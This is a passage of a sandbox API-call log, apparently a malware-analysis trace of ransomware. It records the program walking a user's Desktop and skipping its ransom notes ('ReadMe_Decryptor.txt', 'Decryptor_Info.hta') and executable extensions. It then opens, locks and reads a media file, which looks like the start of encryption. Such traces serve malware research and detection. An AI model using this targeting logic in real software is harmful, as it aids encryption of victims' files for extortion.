hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d72a310, ftCreationTime.dwHighDateTime=0x1d5d868, ftLastAccessTime.dwLowDateTime=0xa9688af0, ftLastAccessTime.dwHighDateTime=0x1d5e01a, ftLastWriteTime.dwLowDateTime=0xa9688af0, ftLastWriteTime.dwHighDateTime=0x1d5e01a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wP8TBOjWTS", cAlternateFileName="WP8TBO~1")) returned 1 [0077.904] lstrcmpW (lpString1="wP8TBOjWTS", lpString2=".") returned 1 [0077.904] lstrcmpW (lpString1="wP8TBOjWTS", lpString2="..") returned 1 [0077.904] lstrlenW (lpString="wP8TBOjWTS") returned 10 [0077.904] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="wP8TBOjWTS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS" [0077.905] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\" [0077.905] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\") returned 49 [0077.905] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\*", fInfoLevelId=0x0, lpFindFileData=0x28e128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e128) returned 0x70d700 [0077.905] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.905] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d72a310, ftCreationTime.dwHighDateTime=0x1d5d868, ftLastAccessTime.dwLowDateTime=0xa9688af0, ftLastAccessTime.dwHighDateTime=0x1d5e01a, ftLastWriteTime.dwLowDateTime=0xa9688af0, ftLastWriteTime.dwHighDateTime=0x1d5e01a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.905] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.905] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.905] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28695460, ftCreationTime.dwHighDateTime=0x1d5e098, ftLastAccessTime.dwLowDateTime=0x1608d6b0, ftLastAccessTime.dwHighDateTime=0x1d5de22, ftLastWriteTime.dwLowDateTime=0x1608d6b0, ftLastWriteTime.dwHighDateTime=0x1d5de22, nFileSizeHigh=0x0, nFileSizeLow=0x12691, dwReserved0=0x0, dwReserved1=0x0, cFileName="-_sk4.pps", cAlternateFileName="")) returned 1 [0077.905] lstrcmpW (lpString1="-_sk4.pps", lpString2=".") returned 1 [0077.905] lstrcmpW (lpString1="-_sk4.pps", lpString2="..") returned 1 [0077.905] lstrcmpiW (lpString1="-_sk4.pps", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.905] lstrcmpiW (lpString1="-_sk4.pps", lpString2="Decryptor_Info.hta") returned -1 [0077.905] PathFindExtensionW (pszPath="-_sk4.pps") returned=".pps" [0077.906] lstrcmpiW (lpString1=".pps", lpString2=".exe") returned 1 [0077.906] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0077.906] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0077.906] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0077.906] lstrcmpiW (lpString1=".pps", lpString2=".msi") returned 1 [0077.906] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6faa88 [0077.906] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x6f36d0 [0077.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6faa88 | out: hHeap=0x6d0000) returned 1 [0077.906] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb5c0 [0077.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.906] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ef39b60, ftCreationTime.dwHighDateTime=0x1d5df60, ftLastAccessTime.dwLowDateTime=0x4b400990, ftLastAccessTime.dwHighDateTime=0x1d5db8c, ftLastWriteTime.dwLowDateTime=0x4b400990, ftLastWriteTime.dwHighDateTime=0x1d5db8c, nFileSizeHigh=0x0, nFileSizeLow=0x92d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ev v7qxZKth.mp3", cAlternateFileName="EVV7QX~1.MP3")) returned 1 [0077.906] lstrcmpW (lpString1="ev v7qxZKth.mp3", lpString2=".") returned 1 [0077.906] lstrcmpW (lpString1="ev v7qxZKth.mp3", lpString2="..") returned 1 [0077.906] lstrcmpiW (lpString1="ev v7qxZKth.mp3", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.906] lstrcmpiW (lpString1="ev v7qxZKth.mp3", lpString2="Decryptor_Info.hta") returned 1 [0077.906] PathFindExtensionW (pszPath="ev v7qxZKth.mp3") returned=".mp3" [0077.906] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0077.906] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0077.906] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0077.906] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0077.906] lstrcmpiW (lpString1=".mp3", lpString2=".msi") returned -1 [0077.906] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6faa88 [0077.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x6f36d0 [0077.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6faa88 | out: hHeap=0x6d0000) returned 1 [0077.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f78a0 [0077.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.907] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3ecb20, ftCreationTime.dwHighDateTime=0x1d5dc9a, ftLastAccessTime.dwLowDateTime=0xc5d21860, ftLastAccessTime.dwHighDateTime=0x1d5e055, ftLastWriteTime.dwLowDateTime=0xc5d21860, ftLastWriteTime.dwHighDateTime=0x1d5e055, nFileSizeHigh=0x0, nFileSizeLow=0xc575, dwReserved0=0x0, dwReserved1=0x0, cFileName="lw5stwB.swf", cAlternateFileName="")) returned 1 [0077.907] lstrcmpW (lpString1="lw5stwB.swf", lpString2=".") returned 1 [0077.907] lstrcmpW (lpString1="lw5stwB.swf", lpString2="..") returned 1 [0077.907] lstrcmpiW (lpString1="lw5stwB.swf", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.907] lstrcmpiW (lpString1="lw5stwB.swf", lpString2="Decryptor_Info.hta") returned 1 [0077.907] PathFindExtensionW (pszPath="lw5stwB.swf") returned=".swf" [0077.907] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0077.907] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0077.907] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0077.907] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0077.907] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0077.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6faa88 [0077.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x6f36d0 [0077.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6faa88 | out: hHeap=0x6d0000) returned 1 [0077.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb868 [0077.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.907] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f06cc0, ftCreationTime.dwHighDateTime=0x1d5dec0, ftLastAccessTime.dwLowDateTime=0x97b6a1a0, ftLastAccessTime.dwHighDateTime=0x1d5e648, ftLastWriteTime.dwLowDateTime=0x97b6a1a0, ftLastWriteTime.dwHighDateTime=0x1d5e648, nFileSizeHigh=0x0, nFileSizeLow=0xd7a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="rGrQROZjIWQS_w.mp4", cAlternateFileName="RGRQRO~1.MP4")) returned 1 [0077.907] lstrcmpW (lpString1="rGrQROZjIWQS_w.mp4", lpString2=".") returned 1 [0077.908] lstrcmpW (lpString1="rGrQROZjIWQS_w.mp4", lpString2="..") returned 1 [0077.908] lstrcmpiW (lpString1="rGrQROZjIWQS_w.mp4", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.908] lstrcmpiW (lpString1="rGrQROZjIWQS_w.mp4", lpString2="Decryptor_Info.hta") returned 1 [0077.908] PathFindExtensionW (pszPath="rGrQROZjIWQS_w.mp4") returned=".mp4" [0077.908] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0077.908] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0077.908] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0077.908] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0077.908] lstrcmpiW (lpString1=".mp4", lpString2=".msi") returned -1 [0077.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6faa88 [0077.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x6f36d0 [0077.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6faa88 | out: hHeap=0x6d0000) returned 1 [0077.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f7938 [0077.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.908] FindNextFileW (in: hFindFile=0x70d700, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16f06cc0, ftCreationTime.dwHighDateTime=0x1d5dec0, ftLastAccessTime.dwLowDateTime=0x97b6a1a0, ftLastAccessTime.dwHighDateTime=0x1d5e648, ftLastWriteTime.dwLowDateTime=0x97b6a1a0, ftLastWriteTime.dwHighDateTime=0x1d5e648, nFileSizeHigh=0x0, nFileSizeLow=0xd7a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="rGrQROZjIWQS_w.mp4", cAlternateFileName="RGRQRO~1.MP4")) returned 0 [0077.908] FindClose (in: hFindFile=0x70d700 | out: hFindFile=0x70d700) returned 1 [0077.908] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa56dd740, ftCreationTime.dwHighDateTime=0x1d5e5b8, ftLastAccessTime.dwLowDateTime=0x78a370d0, ftLastAccessTime.dwHighDateTime=0x1d5e153, ftLastWriteTime.dwLowDateTime=0x78a370d0, ftLastWriteTime.dwHighDateTime=0x1d5e153, nFileSizeHigh=0x0, nFileSizeLow=0x954c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wzj4_bQk.mkv", cAlternateFileName="")) returned 1 [0077.908] lstrcmpW (lpString1="Wzj4_bQk.mkv", lpString2=".") returned 1 [0077.908] lstrcmpW (lpString1="Wzj4_bQk.mkv", lpString2="..") returned 1 [0077.908] lstrcmpiW (lpString1="Wzj4_bQk.mkv", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.909] lstrcmpiW (lpString1="Wzj4_bQk.mkv", lpString2="Decryptor_Info.hta") returned 1 [0077.909] PathFindExtensionW (pszPath="Wzj4_bQk.mkv") returned=".mkv" [0077.909] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0077.909] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0077.909] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0077.909] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0077.909] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0077.909] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.909] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.909] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.909] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6faa88 [0077.909] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.909] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x705add80, ftCreationTime.dwHighDateTime=0x1d5da11, ftLastAccessTime.dwLowDateTime=0x8546f280, ftLastAccessTime.dwHighDateTime=0x1d5e7d4, ftLastWriteTime.dwLowDateTime=0x8546f280, ftLastWriteTime.dwHighDateTime=0x1d5e7d4, nFileSizeHigh=0x0, nFileSizeLow=0x8a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="WZnm.odp", cAlternateFileName="")) returned 1 [0077.909] lstrcmpW (lpString1="WZnm.odp", lpString2=".") returned 1 [0077.909] lstrcmpW (lpString1="WZnm.odp", lpString2="..") returned 1 [0077.909] lstrcmpiW (lpString1="WZnm.odp", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.909] lstrcmpiW (lpString1="WZnm.odp", lpString2="Decryptor_Info.hta") returned 1 [0077.909] PathFindExtensionW (pszPath="WZnm.odp") returned=".odp" [0077.909] lstrcmpiW (lpString1=".odp", lpString2=".exe") returned 1 [0077.909] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0077.909] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0077.909] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0077.909] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0077.910] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.910] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.910] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.910] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6f79d0 [0077.910] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.910] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f0e4e00, ftCreationTime.dwHighDateTime=0x1d5e53b, ftLastAccessTime.dwLowDateTime=0x94ed80d0, ftLastAccessTime.dwHighDateTime=0x1d5d7f5, ftLastWriteTime.dwLowDateTime=0x94ed80d0, ftLastWriteTime.dwHighDateTime=0x1d5d7f5, nFileSizeHigh=0x0, nFileSizeLow=0x17e77, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDsNA6J.bmp", cAlternateFileName="")) returned 1 [0077.910] lstrcmpW (lpString1="XDsNA6J.bmp", lpString2=".") returned 1 [0077.910] lstrcmpW (lpString1="XDsNA6J.bmp", lpString2="..") returned 1 [0077.910] lstrcmpiW (lpString1="XDsNA6J.bmp", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.910] lstrcmpiW (lpString1="XDsNA6J.bmp", lpString2="Decryptor_Info.hta") returned 1 [0077.910] PathFindExtensionW (pszPath="XDsNA6J.bmp") returned=".bmp" [0077.910] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0077.910] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0077.910] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0077.910] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0077.910] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0077.910] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.910] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.910] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.910] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fab00 [0077.910] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.910] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74bbf5d0, ftCreationTime.dwHighDateTime=0x1d5d831, ftLastAccessTime.dwLowDateTime=0x51c98dd0, ftLastAccessTime.dwHighDateTime=0x1d5e1c8, ftLastWriteTime.dwLowDateTime=0x51c98dd0, ftLastWriteTime.dwHighDateTime=0x1d5e1c8, nFileSizeHigh=0x0, nFileSizeLow=0x1559c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZglJ57aMYpZ9P7pLlRh.png", cAlternateFileName="ZGLJ57~1.PNG")) returned 1 [0077.910] lstrcmpW (lpString1="ZglJ57aMYpZ9P7pLlRh.png", lpString2=".") returned 1 [0077.911] lstrcmpW (lpString1="ZglJ57aMYpZ9P7pLlRh.png", lpString2="..") returned 1 [0077.911] lstrcmpiW (lpString1="ZglJ57aMYpZ9P7pLlRh.png", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.911] lstrcmpiW (lpString1="ZglJ57aMYpZ9P7pLlRh.png", lpString2="Decryptor_Info.hta") returned 1 [0077.911] PathFindExtensionW (pszPath="ZglJ57aMYpZ9P7pLlRh.png") returned=".png" [0077.911] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0077.911] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0077.911] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0077.911] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0077.911] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0077.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0077.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb978 [0077.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0077.911] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f35b650, ftCreationTime.dwHighDateTime=0x1d5e567, ftLastAccessTime.dwLowDateTime=0xeab8bb90, ftLastAccessTime.dwHighDateTime=0x1d5dc2a, ftLastWriteTime.dwLowDateTime=0xeab8bb90, ftLastWriteTime.dwHighDateTime=0x1d5dc2a, nFileSizeHigh=0x0, nFileSizeLow=0x158f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zPsVUyevGQ4FW.m4a", cAlternateFileName="ZPSVUY~1.M4A")) returned 1 [0077.911] lstrcmpW (lpString1="zPsVUyevGQ4FW.m4a", lpString2=".") returned 1 [0077.911] lstrcmpW (lpString1="zPsVUyevGQ4FW.m4a", lpString2="..") returned 1 [0077.911] lstrcmpiW (lpString1="zPsVUyevGQ4FW.m4a", lpString2="ReadMe_Decryptor.txt") returned 1 [0077.911] lstrcmpiW (lpString1="zPsVUyevGQ4FW.m4a", lpString2="Decryptor_Info.hta") returned 1 [0077.911] PathFindExtensionW (pszPath="zPsVUyevGQ4FW.m4a") returned=".m4a" [0077.911] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0077.911] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0077.911] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0077.911] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0077.911] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0077.911] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.912] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fab78 [0077.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.912] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f35b650, ftCreationTime.dwHighDateTime=0x1d5e567, ftLastAccessTime.dwLowDateTime=0xeab8bb90, ftLastAccessTime.dwHighDateTime=0x1d5dc2a, ftLastWriteTime.dwLowDateTime=0xeab8bb90, ftLastWriteTime.dwHighDateTime=0x1d5dc2a, nFileSizeHigh=0x0, nFileSizeLow=0x158f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zPsVUyevGQ4FW.m4a", cAlternateFileName="ZPSVUY~1.M4A")) returned 0 [0077.912] FindClose (in: hFindFile=0x70d6c0 | out: hFindFile=0x70d6c0) returned 1 [0077.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-of5Uvp7Nk4OWATL4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-of5uvp7nk4owatl4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0077.912] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x16831 [0077.912] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16951, nNumberOfBytesToLockHigh=0x0) returned 1 [0077.913] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.913] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0077.914] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.914] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200023) returned 0x3110020 [0078.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.020] GetLastError () returned 0x0 [0078.020] SetLastError (dwErrCode=0x0) [0078.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16854) returned 0x744cd8 [0078.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.020] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.021] HeapFree (in: 